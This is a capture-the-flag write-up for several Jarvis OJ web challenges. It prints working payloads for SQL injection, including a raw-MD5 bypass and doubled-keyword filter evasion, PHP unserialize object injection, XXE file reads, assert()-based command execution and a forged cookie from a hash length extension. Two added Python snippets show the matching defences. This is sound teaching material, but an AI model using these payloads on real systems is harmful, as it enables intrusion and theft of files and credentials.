Jarvis OJ - Web
Login
Capturing the request with Burp Suite reveals a hint:
Hint: "select * from `admin` where password='".md5($pass,true)."'"
PHP's md5() function takes two parameters, string (required) and raw (optional):
- string: the string to hash
- raw: TRUE returns the raw 16-byte binary digest; FALSE (default) returns the 32-character hexadecimal form
md5('ffifdyop', true)   // 'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
// resulting query: select * from `admin` where password=''or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c'
// password='' is false, but the string '6...' is coerced to the number 6, so the OR makes the WHERE clause true
// PCTF{R4w_md5_is_d4ng3rous}
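As an added example (not code from the writeup), the following Python reproduces the hint's query construction against an in-memory SQLite table and sets the hardened form beside it. The table contents, the password `hunter2` and the use of SQLite in place of the challenge's MySQL are constructed for the demo; SQLite is used only because it ships with Python, and it coerces the string `'6...'` to a number the same way.

```python
import hashlib
import sqlite3

def make_db():
    # Constructed demo table: one admin row whose password is stored as the hex
    # MD5 of "hunter2". SQLite stands in for the challenge's MySQL backend.
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin (id integer, password text)")
    conn.execute("insert into admin values (1, ?)",
                 (hashlib.md5(b"hunter2").hexdigest(),))
    return conn

def raw_md5_as_php_string(password):
    # PHP's md5($pass, true) yields the 16 raw digest bytes; concatenating them
    # into the query treats each byte as one character, which latin-1 mirrors.
    return hashlib.md5(password.encode()).digest().decode("latin-1")

def raw_digest_prefix(password):
    # The first bytes of md5("ffifdyop") happen to be the ASCII text 'or'6
    return hashlib.md5(password.encode()).digest()[:5]

def vulnerable_lookup(conn, password):
    # Same string concatenation as the hint; the raw digest lands inside the quotes.
    query = ("select * from `admin` where password='"
             + raw_md5_as_php_string(password) + "'")
    return conn.execute(query).fetchall()

def hardened_lookup(conn, password):
    # Hex digest (alphabet [0-9a-f]) bound as a parameter: never parsed as SQL.
    digest = hashlib.md5(password.encode()).hexdigest()
    return conn.execute("select * from `admin` where password=?",
                        (digest,)).fetchall()

def run_demo():
    conn = make_db()
    return {
        "prefix": raw_digest_prefix("ffifdyop"),
        "vulnerable_rows": len(vulnerable_lookup(conn, "ffifdyop")),  # 1: bypassed
        "hardened_rows": len(hardened_lookup(conn, "ffifdyop")),      # 0: rejected
        "legit_rows": len(hardened_lookup(conn, "hunter2")),          # 1: real password works
    }

if __name__ == "__main__":
    print(run_demo())
```

Binding the value as a parameter is what removes the injection; the hex form merely keeps the digest printable. A real login should also not store plain MD5 at all but a proper password hash (PHP's password_hash()/password_verify()).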
Shield's Secret (神盾局的祕密)
Viewing the page source reveals an arbitrary file read:
<img src="showimg.php?img=c2hpZWxkLmpwZw==" width="100%"/>
Try reading showimg.php itself:
view-source:http://web.jarvisoj.com:32768/showimg.php?img=c2hvd2ltZy5waHA=
File content:
<?php
$f = $_GET['img'];
if (!empty($f)) {
    $f = base64_decode($f);
    if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE && stripos($f,'pctf')===FALSE) {
        readfile($f);
    } else {
        echo "File not found!";
    }
}
?>
The filter blocks the characters `..`, `/`, `\` and the string `pctf`. Next, read index.php:
view-source:http://web.jarvisoj.com:32768/showimg.php?img=aW5kZXgucGhw
<?php
require_once('shield.php');
$x = new Shield();
isset($_GET['class']) && $g = $_GET['class'];
if (!empty($g)) {
$x = unserialize($g);
}
echo $x->readfile();
?>
Continue by reading shield.php:
view-source:http://web.jarvisoj.com:32768/showimg.php?img=c2hpZWxkLnBocA==
<?php
//flag is in pctf.php
class Shield {
public $file;
function __construct($filename = '') {
$this -> file = $filename;
}
function readfile() {
if (!empty($this->file) && stripos($this->file,'..')===FALSE
&& stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
return @file_get_contents($this->file);
}
}
}
?>
Combining index.php and shield.php, the flag is in pctf.php, and it can be read by passing a serialized Shield object whose file property is pctf.php through the unserialize() call in index.php.
Payload:
<?php
class Shield {
    public $file;
    function __construct($filename = '') {
        $this->file = "pctf.php";
    }
}
// serialize the object first, then prepend the query-string key
echo 'class=' . serialize(new Shield());
?>
// output: class=O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}
Contents of pctf.php:
<?php
//Ture Flag : PCTF{W3lcome_To_Shi3ld_secret_Ar3a}
//Fake flag:
echo "FLAG: PCTF{I_4m_not_fl4g}"
?>
IN A Mess
Viewing the page source reveals index.phps:
<?php
error_reporting(0);
echo "<!--index.phps-->";
if(!$_GET['id'])
{
header('Location: index.php?id=1');
exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
echo 'Hahahahahaha';
return ;
}
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
require("flag.txt");
}
else
{
print "work harder!harder!harder!";
}
?>
Three parameters, id, a and b, must satisfy the following:
- id: must pass the `!$_GET['id']` check yet satisfy `$id == 0`; bypass with `0e` (loose comparison treats it as 0)
- a: must not contain `.`, and the content read from `$a` must be `1112 is a nice lab!`; bypass with the data:// wrapper (data://text/plain;base64,...)
- b: length greater than 5, `"111" . $b[0]` must match `1114` under eregi(), yet `$b[0] != 4`; bypass with `%00` truncation (strlen() counts the NUL byte, but eregi() is not binary-safe and stops at it)
Payload:
http://web.jarvisoj.com:32780/index.php?id=0e&a=data:,1112%20is%20a%20nice%20lab!&b=%004111111
#output:Come ON!!! {/^HT2mCpcvOLf}
This reveals a directory name; visiting it redirects to
http://web.jarvisoj.com:32780/%5eHT2mCpcvOLf/index.php?id=1
The id parameter is injectable, but testing shows most characters are filtered. Keywords can be bypassed by writing them doubled (the filter strips each keyword once, so ununionion becomes union), and `/*1*/` is used in place of spaces:
1. index.php?id=2/*1*/ununionion/*1*/selselectect/*1*/1,2,3
2. The table name is content
3. index.php?id=2/*1*/ununionion/*1*/selselectect/*1*/1,2,group_concat(column_name)/*1*/frfromom/*1*/information_schema.columns/*1*/where/*1*/table_name=0x636f6e74656e74
4. index.php?id=2/*1*/ununionion/*1*/selselectect/*1*/1,2,context/*1*/frfromom/*1*/content
# PCTF{Fin4lly_U_got_i7_C0ngRatulation5}
API call (api呼叫)
Viewing the source reveals an XXE vulnerability:
function XHR() {
var xhr;
try {xhr = new XMLHttpRequest();}
catch(e) {
var IEXHRVers =["Msxml3.XMLHTTP","Msxml2.XMLHTTP","Microsoft.XMLHTTP"];
for (var i=0,len=IEXHRVers.length;i< len;i++) {
try {xhr = new ActiveXObject(IEXHRVers[i]);}
catch(e) {continue;}
}
}
return xhr;
}
function send(){
evil_input = document.getElementById("evil-input").value;
var xhr = XHR();
xhr.open("post","/api/v1.0/try",true);
xhr.onreadystatechange = function () {
if (xhr.readyState==4 && xhr.status==201) {
data = JSON.parse(xhr.responseText);
tip_area = document.getElementById("tip-area");
tip_area.value = data.task.search+data.task.value;
}
};
xhr.setRequestHeader("Content-Type","application/json");
xhr.send('{"search":"'+evil_input+'","value":"own"}');
}
The page sends JSON via AJAX:
xhr.setRequestHeader("Content-Type","application/json");
Capture the request with Burp Suite and change the header to Content-Type: application/xml, then use an external entity reference to read a file.
Payload:
POST /api/v1.0/try HTTP/1.1
Host: web.jarvisoj.com:9882
Content-Length: 138
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Type: application/xml
Accept: */*
Origin: http://web.jarvisoj.com:9882
Referer: http://web.jarvisoj.com:9882/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=175adad30a81d4-06fa5d0e758aac-326e7207-13c680-175adad30a9626
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE patload [<!ENTITY file SYSTEM "file:///home/ctf/flag.txt">]>
<payload>&file;</payload>
# CTF{XxE_15_n0T_S7range_Enough}
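Defensively, the fix belongs on the server: a JSON endpoint should not accept XML at all, and any XML parser it does run must have external entities disabled. The following Python is an added example, not the challenge's backend. It uses the request body from the payload above (with the same file path, which need not exist because a hardened parser never opens it) as a constructed input and shows three checks: rejecting a DTD, parsing with external entities switched off, and enforcing the Content-Type.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes

# Constructed copy of the XXE body from the writeup.
XXE_BODY = b'''<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE patload [<!ENTITY file SYSTEM "file:///home/ctf/flag.txt">]>
<payload>&file;</payload>'''

# Constructed benign bodies for comparison.
JSON_BODY = b'{"search":"own","value":"own"}'
PLAIN_XML = b"<payload>own</payload>"

def has_doctype(body):
    """Check 1: the API never needs a DTD, so any body declaring one is rejected outright."""
    return b"<!DOCTYPE" in body.upper()

class _TextCollector(ContentHandler):
    """Collects character data so we can see what the entity expanded to."""
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

def parse_text_no_external_entities(body):
    """Check 2: if XML must be parsed, disable external general and parameter
    entities; the &file; reference then contributes no text at all."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(body))
    return "".join(handler.parts)

def accept_request(content_type, body):
    """Check 3: the endpoint is JSON-only. An application/xml Content-Type on a
    JSON API is itself a signal worth logging, not just rejecting."""
    media_type = content_type.split(";")[0].strip().lower()
    return media_type == "application/json" and not has_doctype(body)

if __name__ == "__main__":
    print(has_doctype(XXE_BODY))                          # True
    print(repr(parse_text_no_external_entities(XXE_BODY)))  # ''
    print(repr(parse_text_no_external_entities(PLAIN_XML)))  # 'own'
    print(accept_request("application/xml", XXE_BODY))    # False
```

With external entities disabled the parser still accepts the document, it just never fetches `file:///home/ctf/flag.txt`; rejecting the DOCTYPE up front is the stricter and simpler rule for an API that only ever expects JSON.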
[61dctf]admin
Check robots.txt, which reveals admin_s3cr3t.php; visiting it gives a fake flag: flag{hello guest}
Capture the request with Burp Suite and change admin=1 to get the flag: flag{hello_admin~}
[61dctf]babyphp
The .git directory leaks the source; download it with GitHacker and read index.php.
Key code:
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
<?php
require_once $file;
?>
The `..` sequence is filtered, but assert() evaluates its string argument as PHP code, and $page is interpolated straight into that string, so it can be used to run commands.
Payload:
?page='.system("cat templates/flag.php").'
1. $file = 'templates/'.system("cat templates/flag.php").'.php';
2. assert("strpos('templates/'.system("cat templates/flag.php").'.php', '..') === false");
3. assert("file_exists('templates/'.system("cat templates/flag.php").'.php')");
# In every case system("cat templates/flag.php") ends up being executed
# 61dctf{8e_careful_when_us1ng_ass4rt}
The flag is in the admin's hands (flag在管理員手裡)
Directory scanning finds the file index.php~. The download looks like garbage; rename it to index.php.swp and recover it with vim:
vim -r index.php.swp
Key code:
<?php
$auth = flase;
$role = 'guest';
$salt =
if (isset($_COOKIE["role"])) {
$role = unserialize($_COOKIE["role"]);
$hsh = $_COOKIE["hsh"];
if ($role==="admin" && $hsh === md5($salt.strrev($_COOKIE["role"]))) {
$auth = true;
}
else {
$auth = false;
}
}
else {
$s = serialize($role);
setcookie('role',$s);
$hsh = md5($salt.strrev($s));
setcookie('hsh',$hsh);
}
if ($auth) {
echo "<h3>Welcome Admin. Your flag is
}
else {
echo "<h3>Only Admin can see the flag!!</h3>";
}
?>
strrev(): reverses a string.
The crux of this challenge is the check $hsh === md5($salt.strrev($_COOKIE["role"])), which can be defeated with a hash length extension attack (see http://blog.nsfocus.net/hash-length-extension-attack/):
- With a hash length extension attack, knowing the length of salt and the value hash($salt + strrev($role)), one can compute hash($salt + strrev($role) + padding + appended message) without knowing salt; the hashpump tool performs this computation.
- The salt length can be brute-forced by enumeration (not shown here; it turns out to be 12).
hashpump session:
Input Signature: 3a4727d57463f122833d9e732f94e4e0
Input Data: ;"tseug":5:s
Input Key Length: 12
Input Data to Add: ;"nimda":5:s
fcdc3840332555511c4e4323f6decb07
;"tseug":5:s\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00;"nimda":5:s
Payload (the two cookies):
role=s%3A5%3A%22admin%22%3B%00%00%00%00%00%00%00%C0%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80s%3A5%3A%22guest%22%3B; hsh=fcdc3840332555511c4e4323f6decb07
PCTF{H45h_ext3ndeR_i5_easy_to_us3}